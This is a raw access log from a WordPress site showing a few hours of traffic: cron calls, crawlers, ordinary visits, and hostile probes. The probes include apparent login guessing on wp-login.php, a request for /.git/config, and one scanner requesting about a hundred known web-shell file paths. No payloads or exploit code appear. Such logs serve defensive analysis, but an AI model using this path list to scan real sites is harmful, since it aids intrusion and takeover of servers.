36.133.115.36 - - [05/Sep/2025:12:56:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757048214.4503610134124755859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [05/Sep/2025:12:56:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:13:01:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757048509.1085090637207031250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [05/Sep/2025:13:01:49 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [05/Sep/2025:13:12:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757049178.5593140125274658203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [05/Sep/2025:13:12:59 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [05/Sep/2025:13:14:33 +0800] "POST /wp-cron.php?doing_wp_cron=1757049273.4591219425201416015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:13:14:33 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.153.34.57 - - [05/Sep/2025:13:26:56 +0800] "PUT /SDK/webLanguage HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:13:26:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757050017.3351349830627441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [05/Sep/2025:13:34:19 +0800] "POST /wp-cron.php?doing_wp_cron=1757050459.6540648937225341796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
198.55.98.93 - - [05/Sep/2025:13:34:19 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8"
36.133.115.36 - - [05/Sep/2025:13:45:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757051110.3073709011077880859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
139.59.147.218 - - [05/Sep/2025:13:45:10 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
139.59.147.218 - - [05/Sep/2025:13:45:12 +0800] "POST /wp-login.php HTTP/1.1" 200 2890 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
45.135.193.100 - - [05/Sep/2025:13:45:45 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.101.239 - - [05/Sep/2025:13:53:47 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [05/Sep/2025:14:02:09 +0800] "POST /wp-cron.php?doing_wp_cron=1757052128.9801390171051025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [05/Sep/2025:14:02:09 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:14:10:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757052646.0633919239044189453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.108.178 - - [05/Sep/2025:14:10:46 +0800] "GET /2052/ HTTP/1.1" 200 25909 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [05/Sep/2025:14:16:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757053011.7968850135803222656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:14:16:52 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
115.224.174.58 - - [05/Sep/2025:14:17:56 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88"
36.133.115.36 - - [05/Sep/2025:14:18:00 +0800] "POST /wp-cron.php?doing_wp_cron=1757053080.6380200386047363281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.100.36.224 - - [05/Sep/2025:14:18:00 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.16"
36.100.36.224 - - [05/Sep/2025:14:18:00 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.16"
36.133.115.36 - - [05/Sep/2025:14:33:01 +0800] "POST /wp-cron.php?doing_wp_cron=1757053981.7413239479064941406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
192.254.229.54 - - [05/Sep/2025:14:33:01 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
192.254.229.54 - - [05/Sep/2025:14:33:03 +0800] "POST /wp-login.php HTTP/1.1" 200 2890 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [05/Sep/2025:14:43:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757054609.5592670440673828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.60.195 - - [05/Sep/2025:14:43:29 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Sep/2025:14:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757054787.7501308917999267578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:14:46:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Sep/2025:15:17:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757056671.1115229129791259765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
67.205.34.113 - - [05/Sep/2025:15:17:51 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
67.205.34.113 - - [05/Sep/2025:15:17:52 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [05/Sep/2025:15:22:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757056936.1425070762634277343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:15:22:16 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
116.179.32.112 - - [05/Sep/2025:15:33:06 +0800] "GET /policy/ HTTP/1.1" 200 23548 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [05/Sep/2025:15:42:11 +0800] "POST /wp-cron.php?doing_wp_cron=1757058131.2064080238342285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.44.67.97 - - [05/Sep/2025:15:42:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Sep/2025:15:42:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757058175.8349480628967285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.127.224.63 - - [05/Sep/2025:15:42:55 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [05/Sep/2025:15:49:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757058580.5900559425354003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
44.220.185.250 - - [05/Sep/2025:15:49:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3019.80 Safari/537.32"
44.220.185.250 - - [05/Sep/2025:15:49:41 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3019.80 Safari/537.32"
44.220.185.250 - - [05/Sep/2025:15:49:44 +0800] "GET /feed/ HTTP/1.1" 200 82044 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Sep/2025:15:51:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757058696.0285549163818359375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.56 - - [05/Sep/2025:15:51:36 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Sep/2025:15:53:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757058792.0043129920959472656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [05/Sep/2025:15:53:12 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.169.238.187 - - [05/Sep/2025:16:06:33 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:33 +0800] "GET /elp.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:34 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:34 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:34 +0800] "GET /wp-file.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:35 +0800] "GET /k.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:35 +0800] "GET /al.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [05/Sep/2025:16:06:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757059596.1960060596466064453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.169.238.187 - - [05/Sep/2025:16:06:36 +0800] "GET /wp- HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:36 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:36 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:37 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:37 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:37 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:37 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:38 +0800] "GET /classsmtps.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:38 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:38 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:38 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:39 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:39 +0800] "GET /browse.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:40 +0800] "GET /wp-signup.php HTTP/1.1" 302 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:41 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:42 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:42 +0800] "GET /assets/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:42 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:43 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:43 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:43 +0800] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:43 +0800] "GET /cgi-bin/file.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:43 +0800] "GET /backup.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:44 +0800] "GET /cache.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:44 +0800] "GET /cc.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:44 +0800] "GET /fw.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:44 +0800] "GET /gebase.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:45 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:45 +0800] "GET /doc.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:45 +0800] "GET /e.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:46 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:46 +0800] "GET /fi2.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:46 +0800] "GET /filemanager.php? HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:46 +0800] "GET /go.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:47 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:47 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:47 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:48 +0800] "GET /item.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:48 +0800] "GET /jp.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:48 +0800] "GET /load.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:49 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:49 +0800] "GET /13.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:49 +0800] "GET /lv.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:49 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:50 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:50 +0800] "GET /mar.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:50 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:51 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:51 +0800] "GET /NewFile.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:51 +0800] "GET /past.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [05/Sep/2025:16:06:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757059612.3024830818176269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.169.238.187 - - [05/Sep/2025:16:06:52 +0800] "GET /randkeyword.PhP7 HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:53 +0800] "GET /shell.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:53 +0800] "GET /simple.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:54 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:55 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:55 +0800] "GET /updates.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:55 +0800] "GET /403.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:55 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:56 +0800] "GET /y.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:56 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:56 +0800] "GET /wp-includes/ID3/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:57 +0800] "GET /wp-admin/function.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:58 +0800] "GET /.well-known/acme-challenge/muse.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:59 +0800] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:59 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:59 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:06:59 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:00 +0800] "GET /wp-includes/Text/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:00 +0800] "GET /templates/protostar/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:00 +0800] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:00 +0800] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:01 +0800] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:01 +0800] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:01 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:01 +0800] "GET /wp-includes/bk/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:01 +0800] "GET /wp-includes/blocks/shortcode/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:02 +0800] "GET /wp-includes/css/dist/widgets/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:02 +0800] "GET /wp-includes/fonts/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:02 +0800] "GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:02 +0800] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:03 +0800] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:03 +0800] "GET /wp-admin/includes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:03 +0800] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:03 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:04 +0800] "GET /wp-admin/js/wp-login.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:04 +0800] "GET /wp-admin/maint/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:04 +0800] "GET /wp-content/plugins/WordPressCore/cong.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:04 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:04 +0800] "GET /wp-content/plugins/index.php HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:05 +0800] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:05 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:06 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:06 +0800] "GET /wp-content/themes/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:07 +0800] "GET /wp-content/themes/index.php HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:07 +0800] "GET /wp-content/themes/themes.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:07 +0800] "GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:08 +0800] "GET /wp-content/upgrade/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:08 +0800] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:08 +0800] "GET /wp-content/uploads/index.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:09 +0800] "GET /wp-includes/SimplePie/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:09 +0800] "GET /wp-includes/IXR/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:09 +0800] "GET /wp-includes/404.php HTTP/1.1" 404 27 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:09 +0800] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:10 +0800] "GET /admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:12 +0800] "GET /.tmb/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:12 +0800] "GET /shop/ HTTP/1.1" 200 72307 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:14 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:15 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:15 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:15 +0800] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:16 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:16 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:16 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:17 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:18 +0800] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:18 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:19 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:19 +0800] "GET /wp-includes/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:19 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:19 +0800] "GET /wp-includes/IXR/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:19 +0800] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:21 +0800] "GET /wp-includes/Requests/Cookie/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:22 +0800] "GET /wp-includes/Requests/Response/ HTTP/1.1" 404 31381 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:23 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:23 +0800] "GET /wp-includes/Text/Diff/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:24 +0800] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 403 146 "-" "-"
52.169.238.187 - - [05/Sep/2025:16:07:24 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 146 "-" "-"
